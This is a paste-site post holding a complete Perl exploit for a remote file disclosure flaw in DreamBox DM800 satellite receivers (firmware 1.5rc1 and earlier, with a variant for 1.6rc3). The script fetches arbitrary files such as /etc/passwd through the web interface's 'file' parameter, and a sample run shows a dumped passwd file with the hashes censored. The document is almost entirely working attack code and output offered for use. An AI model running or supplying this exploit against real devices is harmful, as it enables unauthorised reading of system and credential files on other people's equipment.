hackerscommunity

DreamBox DM800 1.5rc1 'file' remote file disclosure exploit

Jul 11th, 2015
#!/usr/bin/perl
#  DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
#
#  Author: Todor Donev
#  Email: todor.donev@@gmail.com
#  Type: Hardware
#  Vuln Type: Remote
#####
#  Product summary: DreamBox DM800 is a powerful receiver
#  for digital TV and Radio programs based on Linux.
#  Product web page: http://www.dream-multimedia-tv.de
#####
# playground$ perl dreambox.pl target /etc/passwd
# [+] DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
#
# root:<CENSORED>:0:0:root:/home/root:/bin/sh
# daemon:*:1:1:daemon:/usr/sbin:/bin/sh
# bin:*:2:2:bin:/bin:/bin/sh
# sys:*:3:3:sys:/dev:/bin/sh
# sync:*:4:65534:sync:/bin:/bin/sync
# games:*:5:60:games:/usr/games:/bin/sh
# man:*:6:12:man:/var/cache/man:/bin/sh
# lp:*:7:7:lp:/var/spool/lpd:/bin/sh
# mail:*:8:8:mail:/var/mail:/bin/sh
# news:*:9:9:news:/var/spool/news:/bin/sh
# uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
# proxy:*:13:13:proxy:/bin:/bin/sh
# www-data:*:33:33:www-data:/var/www:/bin/sh
# backup:*:34:34:backup:/var/backups:/bin/sh
# list:*:38:38:Mailing List Manager:/var/list:/bin/sh
# irc:*:39:39:ircd:/var/run/ircd:/bin/sh
# gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
# nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
# avahi:x:500:64002:Avahi:/var/run/avahi-daemon:/bin/sh
# ftp:x:501:64003:Linux User,,,:/var/tmp/ftp:/bin/false
# gbox:<CENSORED>:0:0::/:/bin/sh
#
# playground$
#####
#  Thanks to all my friends and special to the best Tsvetelina Emirska,
#  that support and respect me !! =)
#####
#
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
use strict;
use warnings;
use LWP::Simple;

print "[+] DreamBox DM800 <= 1.5rc1 Remote File Disclosure\n";

# First argument: target host. Second argument: absolute path of the file to read.
my $host = $ARGV[0];
my $d    = $ARGV[1];

if (!$ARGV[0]) {
    print "[!] usg: perl dreambox.pl <host> </path/file>\n";
    exit;
}
# Default to /etc/passwd when no path is given.
if (!$ARGV[1]) {
    $d = "/etc/passwd";
}
## Edit here for exploiting DreamBox DM800 <= 1.6rc3
# my $result = get("http://$host/file?file=$d");
## Greetings for ShellVision who found this bug in version 1.6rc3
# Request the file through the web interface's 'file' parameter.
my $result = get("http://$host/file/?file=$d");
if (defined $result) {
    print "\n$result";
}
else {
    # LWP::Simple's get() returns undef when the request fails.
    print "[-] Not vuln.. =(\n";
}